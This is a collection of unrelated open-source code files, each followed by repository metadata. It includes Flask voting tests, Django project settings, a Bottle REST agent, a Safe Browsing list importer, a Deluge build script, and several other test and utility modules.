'<td class="error">Not a valid choice</td>'
in output.data)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
self.assertTrue(
'<input type="hidden" name="action" value="preview" />'
in output.data)
csrf_token = output.data.split(
'name="csrf_token" type="hidden" value="')[1].split('">')[0]
# Invalid vote: No candidate
data = {
'action': 'preview',
'csrf_token': csrf_token,
}
output = self.app.post('/vote/test_election5', data=data)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h2>test election 5 shortdesc</h2>' in output.data)
self.assertTrue(
'<td class="error">Not a valid choice</td>'
in output.data)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
self.assertTrue(
'<input type="hidden" name="action" value="preview" />'
in output.data)
# Invalid vote: Not numeric
data = {
'candidate': 'a',
'action': 'preview',
'csrf_token': csrf_token,
}
output = self.app.post('/vote/test_election5', data=data)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h2>test election 5 shortdesc</h2>' in output.data)
self.assertTrue(
'<input type="hidden" name="action" value="preview" />'
in output.data)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
# Valid input
data = {
'candidate': 7,
'action': 'preview',
'csrf_token': csrf_token,
}
output = self.app.post('/vote/test_election5', data=data)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h2>test election 5 shortdesc</h2>' in output.data)
self.assertTrue(
'<input type="hidden" name="action" value="submit" />'
in output.data)
self.assertTrue(
'<li class="message">Please confirm your vote!</li>'
in output.data)
def test_vote_simple_process(self):
""" Test the vote_simple function - the voting part. """
output = self.app.get(
'/vote/test_election', follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<title>OpenID transaction in progress</title>' in output.data
or 'discoveryfailure' in output.data)
self.setup_db()
user = FakeUser(['packager'], username='pingou')
with user_set(fedora_elections.APP, user):
# Invalid candidate id - no csrf
data = {
'candidate': 1,
'action': 'submit',
}
output = self.app.post(
'/vote/test_election5', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
csrf_token = output.data.split(
'name="csrf_token" type="hidden" value="')[1].split('">')[0]
# Invalid candidate id
data = {
'candidate': 1,
'action': 'submit',
'csrf_token': csrf_token,
}
output = self.app.post(
'/vote/test_election5', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
# Invalid vote: too low
data = {
'candidate': -1,
'action': 'submit',
'csrf_token': csrf_token,
}
output = self.app.post(
'/vote/test_election5', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
# Invalid vote: Not numeric
data = {
'candidate': 'a',
'action': 'submit',
'csrf_token': csrf_token,
}
output = self.app.post(
'/vote/test_election5', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertEqual(
output.data.count('<td class="error">Not a valid choice</td>'),
1)
# Valid input
data = {
'candidate': 8,
'action': 'submit',
'csrf_token': csrf_token,
}
output = self.app.post(
'/vote/test_election5', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'class="message">Your vote has been recorded. Thank you!</'
in output.data)
self.assertTrue('<h3>Current elections</h3>' in output.data)
self.assertTrue('<h3>Next 1 elections</h3>' in output.data)
self.assertTrue('<h3>Last 2 elections</h3>' in output.data)
if __name__ == '__main__':
SUITE = unittest.TestLoader().loadTestsFromTestCase(
FlaskSimpleElectionstests)
unittest.TextTestRunner(verbosity=2).run(SUITE)
| gpl-2.0 | 9,100,632,720,071,178,000 | 35.613546 | 79 | 0.54124 | false |
Cesar0510/lbzproject | lbzproject/settings/base.py | 1 | 3224 | """
Django settings for lbzproject project.
Generated by 'django-admin startproject' using Django 1.11.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ROOT_DIR = os.path.dirname(BASE_DIR)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'm*b97e*!6!vb2j-=8t$3mzj$doenpmv**bc07*u39*4#rib(w5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lbzproject.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(ROOT_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'lbzproject.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
# apps #
INSTALLED_APPS += ['apps.principal']
| apache-2.0 | -665,079,409,604,450,000 | 25.211382 | 91 | 0.688275 | false |
manue1/connectivity-manager-agent | cm-agent/wsgi/application.py | 1 | 3443 | # Copyright 2015 Technische Universitaet Berlin
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
from bottle import Bottle, response, request
from core.agent import Agent as CMAgent
__author__ = 'beb'
"""
# Private error methods
"""
def bad_request(param):
response.body = param
response.status = 400
response.content_type = 'application/json'
return response
def internal_error(message):
response.body = message
response.status = 500
response.content_type = 'application/json'
return response
def not_found(message):
response.body = message
response.status = 404
response.content_type = 'application/json'
return response
def encode_dict_json(data_dict):
data_json = json.dumps(data_dict)
return data_json
"""
# ReST API
"""
class Application:
def __init__(self, host, port):
self._host = host
self._port = port
self._app = Bottle()
self._route()
self._debug = True
self.agent = CMAgent()
def _route(self):
# Welcome Screen
self._app.route('/', method="GET", callback=self._welcome)
# Hypervisor methods
self._app.route('/hosts', method="GET", callback=self._hosts_list)
# QoS methods
self._app.route('/qoses', method=["POST", "OPTIONS"], callback=self._qoses_set)
def start(self):
self._app.run(host=self._host, port=self._port)
def _welcome(self):
response.body = "Welcome to the Connectivity Manager Agent"
response.status = 200
return response
def _hosts_list(self):
"""
List all OpenStack hypervisors with runtime details
"""
agent = CMAgent()
hypervisors = agent.list_hypervisors()
response.body = encode_dict_json(hypervisors)
logging.debug('Hypervisor list response', response.body)
response.status = 200
response.content_type = 'application/json'
return response
def _qoses_set(self):
"""
Set QoS for VMs
"""
qos_json = request.body.getvalue()
logging.debug('QoS JSON is: %s', qos_json)
if not qos_json:
return bad_request('This POST methods requires a valid JSON')
try:
set_qos = self.agent.set_qos(qos_json)
except Exception, exc:
logging.error(exc.message)
return internal_error(exc.message)
response.status = 200
response.body = encode_dict_json(set_qos)
logging.debug('QoS processed: %s', response.body)
return response
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s_%(process)d:%(lineno)d [%(levelname)s] %(message)s',level=logging.INFO)
server = Application(host='0.0.0.0', port=8091)
print('Connectivity Manager Agent serving on port 8091...')
server.start()
| apache-2.0 | 7,927,272,825,957,574,000 | 26.99187 | 115 | 0.636945 | false |
plagree/TOPKS | test/yelp/TOPZIP/script.py | 1 | 2180 | #!/usr/bin/env python
#-*-coding: utf-8 -*-
import urllib2
import json
import numpy as np
import sys
import cPickle as pickle
TITLE = r'\textbf{Yelp social network}'
N = 100 # Number of queries for averaging
DOMAIN = 'http://localhost:8000/topks'
SUPERNODES = False
MAPPING = dict()
T = 2000
NEW_QUERY = True
N_NEIGH = 40000
THRESHOLD = 0.
def read_test_input(line):
seeker, item, query = line.rstrip().split()
return (int(seeker), int(item), query)
def NDCGrequest(seeker, tag, k=20, alpha=0):
q = tag
url = DOMAIN + \
'?q=' + q + \
'&seeker=' + str(seeker) + \
'&alpha=' + str(alpha) + \
'&k=' + str(k) + \
'&t='+ str(T) + \
'&newQuery=' + str(NEW_QUERY) + \
'&nNeigh=' + str(N_NEIGH)
result = None
try:
response = urllib2.urlopen(url)
data = json.load(response)
if not data.has_key('status'):
return None
if data.get('status') != 1:
return None
results = data['results']
for res in results:
if res['id'] == 35397:
result = res['rank']
except urllib2.HTTPError, error:
print error.read()
except (ValueError, KeyError, TypeError) as error:
print error
return result
def main(input_tests):
results = dict()
PREF_MIN = 2
PREF_MAX = 6
ALPHA = 0.
with open('output.txt', 'a') as f2:
with open(input_tests, 'r') as f:
i = 0
for line in f:
if i >= N:
break
seeker, query, tag = read_test_input(line)
#if len(tag) < 6:
# continue
i += 1
print i
for l in range(PREF_MIN, PREF_MAX+1):
result = NDCGrequest(seeker, tag[:l], k=1000, alpha=ALPHA)
f2.write('%d\t%d\t%s\t%d\t%d\t%d\t%f\t%f\t%d\t%d\t%d\t%d\n'
% (seeker, query, tag, -1, T, l, ALPHA,
THRESHOLD, result, 1, 3, 10))
if __name__ == '__main__':
input_tests = sys.argv[1]
main(input_tests)
| gpl-3.0 | 8,087,897,326,729,252,000 | 27.311688 | 79 | 0.490826 | false |
CCrypto/ccvpn3 | ccvpn/settings.py | 1 | 7026 | """
Django settings for ccvpn project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.core.validators import RegexValidator
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@4+zlzju0(wymvatr%8uguuc-aeap8yaz$269ftloqhd&vm%c4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_countries',
'lambdainst',
'payments',
'tickets',
'constance',
'constance.backends.database',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.common.BrokenLinkEmailsMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.middleware.locale.LocaleMiddleware',
'lambdainst.middleware.ReferrerMiddleware',
'lambdainst.middleware.CampaignMiddleware',
)
ROOT_URLCONF = 'ccvpn.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates/'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.template.context_processors.i18n',
'django.template.context_processors.static',
'django.template.context_processors.csrf',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'ccvpn.context_processors.some_settings',
],
},
},
]
WSGI_APPLICATION = 'ccvpn.wsgi.application'
LOGIN_URL = 'account:login'
LOGOUT_URL = 'account:logout'
LOGIN_REDIRECT_URL = 'account:index'
LOGOUT_REDIRECT_URL = '/'
PAGES_DIR = BASE_DIR + '/pages/'
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'ccvpn.passwords.LegacyPasswordHasher',
]
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LANGUAGES = (
('fr', "French"),
('en', "English"),
)
LOCALE_PATHS = (
os.path.join(BASE_DIR, 'locale/'),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
# Security
X_FRAME_OPTIONS = 'SAMEORIGIN'
SESSION_COOKIE_SECURE = False
CSRF_COOKIE_SECURE = False
CSRF_COOKIE_HTTPONLY = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SECURE_BROWSER_XSS_FILTER = True
SECURE_SSL_REDIRECT = False
SECURE_HSTS_SECONDS = 3600
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
# Enable Discourse SSO
DISCOURSE_SSO = False
DISCOURSE_SECRET = '...'
DISCOURSE_URL = 'https://forum.ccrypto.org/'
# OpenVPN CA Certificate
with open(BASE_DIR + '/ccvpn/ca.crt') as ca_file:
OPENVPN_CA = ca_file.read()
# HTML added before </head>
ADDITIONAL_HEADER_HTML = ''
# HTML added before </body>
ADDITIONAL_HTML = ''
# Custom per cluster message displayed config page
# 'cluster_name': "No P2P"
LAMBDAINST_CLUSTER_MESSAGES = {}
# Name used in ticket emails
TICKETS_SITE_NAME = 'CCrypto VPN Support'
# Full URL to the site root
ROOT_URL = ''
# Forwarded for header name, if any (None will use remote_addr)
REAL_IP_HEADER_NAME = None
# reCAPTCHA API details. If empty, no captcha is displayed.
RECAPTCHA_API = 'https://www.google.com/recaptcha/api/siteverify'
RECAPTCHA_SITE_KEY = ''
RECAPTCHA_SECRET_KEY = ''
# lcore API settings
LCORE = dict(
BASE_URL='https://core.test.lambdavpn.net/v1/',
API_KEY='',
API_SECRET='',
INST_SECRET='',
CACHE_TTL=10,
)
# VPN auth credentials and expiration time storage
# - if 'core', password and expiration_date will be replicated to core and
# auth will be done from there.
# - if 'inst', both will be kept here and core should call the API here to
# authenticate users.
# 'core' is faster and doesn't depend on the instance's stability, 'inst'
# lets you generate client_config dynamically.
# /!\ don't use 'core' with unit tests for now.
VPN_AUTH_STORAGE = 'inst'
# Payment & Trial
# Payment backends. See payments/backends.py for more infos.
PAYMENTS_BACKENDS = {
'paypal': {
'TEST': True, # Sandbox
'ADDRESS': '[email protected]', # Your PayPal primary address
},
# Remove the leading '_' to enable these backends.
'_stripe': {
'API_KEY': '',
'PUBLIC_KEY': '',
},
'_bitcoin': {
'URL': 'http://test:[email protected]:18332/',
'BITCOIN_VALUE': 36000, # Value of one bitcoin in currency*100
},
}
PAYMENTS_CURRENCY = ('eur', '€')
CONSTANCE_BACKEND = 'constance.backends.database.DatabaseBackend'
CONSTANCE_CONFIG = {
'MOTD': ('', "Public site message, displayed on homepage"),
'MOTD_USER': ('', "Message for users, displayed on account home"),
'MONTHLY_PRICE_EUR': (300, "Base subscription price per month (x0.01€)"),
'BTC_EUR_VALUE': (300000, "Current value of a bitcoin (x0.01€/btc)"),
'TRIAL_PERIOD_HOURS': (2, "Hours given for each trial period"),
'TRIAL_PERIOD_MAX': (84, "Maximum number of trial periods to give (84*2h=1w)"),
'NOTIFY_DAYS_BEFORE': ("3, 1", "When to send account expiration notifications. In number of days before, separated y commas",
'integer_list'),
}
CONSTANCE_ADDITIONAL_FIELDS = {
'integer_list': ['django.forms.fields.CharField', {
'validators': [RegexValidator(r'^([0-9]+[ ,]+)*([0-9]+)?$')],
}],
}
# Local settings
try:
from .local_settings import * # noqa
except ImportError:
pass
| mit | -5,602,495,552,386,245,000 | 26 | 129 | 0.67265 | false |
nccgroup/Mortimer | importgoogle.py | 1 | 5412 | #!/usr/bin/python
# A collection of scripts for processing network forensics type data and intel, mainly into a postgres database.
#
# Released as open source by NCC Group Plc - http://www.nccgroup.com/
#
# Developed for John Green, cirt at nccgroup dot com
#
# https://github.com/nccgroup/mortimer
#
# Released under AGPL see LICENSE for more information
import urllib
import urllib2
import psycopg2
import sys
from struct import unpack
APIKEY='GETYOUROWNKEY!'
APPVERSION='1.09'
PVERSION='2.2'
lists=['goog-malware-shavar', 'goog-regtest-shavar', 'goog-whitedomain-shavar', 'googpub-phish-shavar']
url = 'https://safebrowsing.clients.google.com/safebrowsing/downloads?client=api&apikey=%s&appver=%s&pver=%s' % (APIKEY,APPVERSION,PVERSION)
conn=psycopg2.connect("dbname=bro user=analyst3")
cur=conn.cursor()
def process_chunkS(chunk,hashlen,num,list):
n=0
# Empty chunk (sent by google to remove gaps)
if (len(chunk) == 0):
cur.execute("INSERT INTO s_chunks (num,list) values (%s,%s)",(num,list))
return
while(n<len(chunk)):
#hostkey=unpack('I',chunk[n:n+4])[0]
hostkey=chunk[n:n+4]
count=unpack('B',chunk[n+4])[0]
#print "Count",count
n+=5
if (count == 0):
addchunknum=unpack('>I',chunk[n:n+4])[0]
#print hostkey,addchunknum
cur.execute("INSERT INTO s_chunks (hostkey,num,add_num,list) values (%s,%s,%s,%s)", (psycopg2.Binary(hostkey),num,addchunknum,list))
n+=4
else:
#prefix=[]
for i in range(count):
#print i,count,n,len(chunk)
addchunknum=unpack('>I',chunk[n:n+4])[0]
prefix=chunk[n+4:n+4+hashlen]
#.encode('hex'))
#print hostkey,addchunknum,prefix
cur.execute("INSERT INTO s_chunks (hostkey,num,add_num,prefix,list) values (%s,%s,%s,%s,%s)", (psycopg2.Binary(hostkey),num,addchunknum,psycopg2.Binary(prefix),list))
n+=4+hashlen
def process_chunkA(chunk,hashlen,num,list):
n=0
if (len(chunk)== 0):
cur.execute("INSERT INTO a_chunks (num,list) values (%s,%s)",(num,list))
return
while(n<len(chunk)):
hostkey=chunk[n:n+4]
count=unpack('B',chunk[n+4])[0]
n+=5
if (count==0):
cur.execute("INSERT INTO a_chunks (hostkey,num,list) values (%s,%s,%s)", (psycopg2.Binary(hostkey),num,list))
else:
for i in range(count):
prefix=chunk[n:n+hashlen]
#.encode('hex'))
#print hostkey,prefix
cur.execute("INSERT INTO a_chunks (hostkey,num,prefix,list) values (%s,%s,%s,%s)", (psycopg2.Binary(hostkey),num,psycopg2.Binary(prefix),list))
n+=hashlen
def rangeConvert(nums):
"""
nums: sorted list of integers.
returns comma separated list wit range
"""
if len(nums) == 0:
return ''
output = []
i = 0
while i < len(nums):
output.append(str(nums[i]))
use_range = False
while i < len(nums) - 1 and nums[i + 1] - nums[i] == 1:
i += 1
use_range = True
if use_range:
output.append('-')
output.append(str(nums[i]))
if i < len(nums) - 1:
output.append(',')
i += 1
return ''.join(output)
def rangeSplit(rangeStr):
"""
range: sorted range list eg 1,3-6,9-10,12,17
returns sorted list of integers
"""
ret=[]
for item in rangeStr.rstrip().split(','):
num=item.split('-')
if (len(num) == 1):
ret.append(int(num[0]))
elif (len(num) == 2):
for val in range(int(num[0]),int(num[1])):
ret.append(val)
return ret
print url
data=''
for list in lists:
cur.execute("SELECT DISTINCT num FROM a_chunks WHERE list=%s ORDER BY num ASC",(list,))
achunks=cur.fetchall()
arange=rangeConvert(map(lambda x:x[0],achunks))
cur.execute("SELECT DISTINCT num FROM s_chunks WHERE list= %s ORDER BY num ASC",(list,))
schunks=cur.fetchall()
srange=rangeConvert(map(lambda x:x[0],schunks))
data+=list+';'
if arange:
data+='a:'+arange
if arange and srange:
data+=':'
if srange:
data+='s:'+srange
data+='\n'
#sys.exit(1)
print data
#sys.exit(1)
request=urllib2.Request(url,data)
#sys.exit(1)
response=urllib2.urlopen(request)
for line in response.readlines():
line=line.rstrip()
(keyword,data)=line.split(':')
print keyword,data
if (keyword == 'n'):
delay=data
elif (keyword == 'i'):
list=data
elif (keyword == 'u'):
url=data
redirect_request=urllib2.Request('https://'+url)
redirect_response=urllib2.urlopen(redirect_request)
while (True):
redirect_line=redirect_response.readline()
if (not redirect_line):
break
(action,chunknum,hashlen,chunklen)=redirect_line.split(':')
print "reading ",int(chunklen)
print "chunk num ",int(chunknum)
if (action == 'a'):
chunk=redirect_response.read(int(chunklen))
process_chunkA(chunk,int(hashlen),int(chunknum),list)
elif (action == 's'):
chunk=redirect_response.read(int(chunklen))
process_chunkS(chunk,int(hashlen),int(chunknum),list)
else:
print "Unknown chunktype"
sys.exit(1)
print redirect_line
#sys.exit(1)
elif (keyword == 'ad'):
print "a delete",data
nums=rangeSplit(data)
cur.execute("DELETE FROM a_chunks WHERE num=ANY(%s)",(nums,))
print nums
elif (keyword == 'sd'):
print "s delete",data
nums=rangeSplit(data)
print nums
cur.execute("DELETE FROM s_chunks WHERE num=ANY(%s)",(nums,))
else:
print "keyword not recognised"
sys.exit(1)
conn.commit()
cur.close()
conn.close()
sys.exit(1)
| agpl-3.0 | 2,277,434,971,933,669,600 | 24.771429 | 170 | 0.642831 | false |
laanwj/deluge | win32/deluge-bbfreeze.py | 1 | 2368 | build_version = "1.3.1"
python_path = "C:\\Python26\\"
import os, glob
import shutil
shutil.copy(python_path + "Scripts\deluge-script.pyw", python_path + "Scripts\deluge.py")
shutil.copy(python_path + "Scripts\deluge-script.pyw", python_path + "Scripts\deluge-debug.py")
shutil.copy(python_path + "Scripts\deluged-script.py", python_path + "Scripts\deluged.py")
shutil.copy(python_path + "Scripts\deluge-web-script.py", python_path + "Scripts\deluge-web.py")
shutil.copy(python_path + "Scripts\deluge-gtk-script.pyw", python_path + "Scripts\deluge-gtk.py")
shutil.copy(python_path + "Scripts\deluge-console-script.py", python_path + "Scripts\deluge-console.py")
includes=("libtorrent", "gzip", "zipfile", "re", "socket", "struct", "cairo", "pangocairo", "atk", "pango", "wsgiref.handlers", "twisted.internet.utils", "gio", "gtk.glade")
excludes=("numpy", "OpenGL", "psyco", "win32ui")
dst = "..\\build-win32\\deluge-bbfreeze-" + build_version + "\\"
from bbfreeze import Freezer
f = Freezer(dst, includes=includes, excludes=excludes)
f.include_py = False
f.addScript(python_path + "Scripts\deluge.py", gui_only=True)
f.addScript(python_path + "Scripts\deluge-debug.py", gui_only=False)
f.addScript(python_path + "Scripts\deluged.py", gui_only=False)
f.addScript(python_path + "Scripts\deluge-web.py", gui_only=False)
f.addScript(python_path + "Scripts\deluge-gtk.py", gui_only=True)
f.addScript(python_path + "Scripts\deluge-console.py", gui_only=False)
f() # starts the freezing process
# add icons to the exe files
import icon
icon_path = os.path.join(os.path.dirname(__file__), "deluge.ico")
icon.CopyIcons(dst+"deluge.exe", icon_path)
icon.CopyIcons(dst+"deluge-debug.exe", icon_path)
icon.CopyIcons(dst+"deluged.exe", icon_path)
icon.CopyIcons(dst+"deluge-web.exe", icon_path)
icon.CopyIcons(dst+"deluge-gtk.exe", icon_path)
icon.CopyIcons(dst+"deluge-console.exe", icon_path)
# exclude files which are already included in GTK or Windows
excludeFiles = ("MSIMG32.dll", "MSVCR90.dll", "MSVCP90.dll", "POWRPROF.dll", "freetype*.dll", "iconv.dll", "intl.dll", "libatk*.dll", "libcairo*.dll", "libexpat*.dll", "libfontconfig*.dll", "libfreetype*.dll", "libgio*.dll", "libpng*.dll", "libtiff*.dll", "zlib1.dll")
for file in excludeFiles:
for filename in glob.glob(dst + file):
print "removing file:", filename
os.remove(filename)
| gpl-3.0 | -6,369,595,552,446,803,000 | 51.622222 | 268 | 0.711993 | false |
GoogleCloudPlatform/datacatalog-connectors | google-datacatalog-connectors-commons/src/google/datacatalog_connectors/commons/monitoring/metrics_processor.py | 1 | 2132 | #!/usr/bin/python
#
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import timeit
from google.datacatalog_connectors.commons.monitoring import \
monitoring_facade
class MetricsProcessor:
def __init__(self,
project_id,
location_id,
entry_group_id,
enable_monitoring,
task_id=None):
self.__enable_monitoring = enable_monitoring
if enable_monitoring:
self.__monitoring_facade = monitoring_facade.MonitoringFacade(
project_id, location_id, entry_group_id, task_id)
self.__monitoring_facade.create_metrics()
self.__start_time = timeit.default_timer()
def reset_start_time(self):
self.__start_time = timeit.default_timer()
def process_elapsed_time_metric(self):
if self.__enable_monitoring:
stop_time = timeit.default_timer()
elapsed_time = int((stop_time - self.__start_time) * 1000)
self.__monitoring_facade.write_elapsed_time_metric(elapsed_time)
def process_entries_length_metric(self, entries_length):
if self.__enable_monitoring:
self.__monitoring_facade.write_entries_length_metric(
entries_length)
def process_metadata_payload_bytes_metric(self, metadata):
if self.__enable_monitoring:
metadata_as_json = json.dumps(metadata, default=str)
json_bytes = len(metadata_as_json.encode())
self.__monitoring_facade.write_metadata_payload_bytes_metric(
json_bytes)
| apache-2.0 | -4,256,730,824,790,819,000 | 35.758621 | 76 | 0.651501 | false |
MattRijk/ebook_site | books/migrations/0011_auto_20160422_1235.py | 1 | 1050 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('books', '0010_auto_20160422_1158'),
]
operations = [
migrations.AddField(
model_name='bookhasauthor',
name='name',
field=models.CharField(max_length=45, blank=True),
),
migrations.AddField(
model_name='bookhascategory',
name='title',
field=models.CharField(max_length=45, blank=True),
),
migrations.AlterField(
model_name='bookhasauthor',
name='id',
field=models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='bookhascategory',
name='id',
field=models.AutoField(primary_key=True, auto_created=True, serialize=False, verbose_name='ID'),
),
]
| mit | -7,376,450,695,064,534,000 | 28.882353 | 108 | 0.55619 | false |
luzfcb/cookiecutter | tests/test_specify_output_dir.py | 1 | 1852 | # -*- coding: utf-8 -*-
"""Tests for cookiecutter's output directory customization feature."""
import pytest
from cookiecutter import main
@pytest.fixture
def context():
"""Fixture to return a valid context as known from a cookiecutter.json."""
return {
u'cookiecutter': {
u'email': u'[email protected]',
u'full_name': u'Raphael Pierzina',
u'github_username': u'hackebrot',
u'version': u'0.1.0',
}
}
@pytest.fixture
def output_dir(tmpdir):
return str(tmpdir.mkdir('output'))
@pytest.fixture
def template(tmpdir):
template_dir = tmpdir.mkdir('template')
template_dir.join('cookiecutter.json').ensure(file=True)
return str(template_dir)
@pytest.fixture(autouse=True)
def mock_gen_context(mocker, context):
mocker.patch('cookiecutter.main.generate_context', return_value=context)
@pytest.fixture(autouse=True)
def mock_prompt(mocker):
mocker.patch('cookiecutter.main.prompt_for_config')
@pytest.fixture(autouse=True)
def mock_replay(mocker):
mocker.patch('cookiecutter.main.dump')
def test_api_invocation(mocker, template, output_dir, context):
mock_gen_files = mocker.patch('cookiecutter.main.generate_files')
main.cookiecutter(template, output_dir=output_dir)
mock_gen_files.assert_called_once_with(
repo_dir=template,
context=context,
overwrite_if_exists=False,
skip_if_file_exists=False,
output_dir=output_dir
)
def test_default_output_dir(mocker, template, context):
mock_gen_files = mocker.patch('cookiecutter.main.generate_files')
main.cookiecutter(template)
mock_gen_files.assert_called_once_with(
repo_dir=template,
context=context,
overwrite_if_exists=False,
skip_if_file_exists=False,
output_dir='.'
)
| bsd-3-clause | 4,489,060,777,101,034,000 | 23.693333 | 78 | 0.671166 | false |
willrp/willbuyer | backend/tests/functional/api/cart/test_order.py | 1 | 1226 | import requests
from backend.util.response.error import ErrorSchema
def test_order(domain_url, auth_session, es_create, willorders_ws_db_session):
prod_list = es_create("products", 2)
item_id = prod_list[0].meta["id"]
item_id2 = prod_list[1].meta["id"]
auth_session.post(
domain_url + "/api/cart/update/%s/1" % item_id
)
response = auth_session.post(
domain_url + "/api/cart/update/%s/2" % item_id2
)
cookie = response.cookies.get("session")
response = auth_session.put(
domain_url + "/api/cart/order"
)
data = response.json()
assert data == {}
assert response.status_code == 201
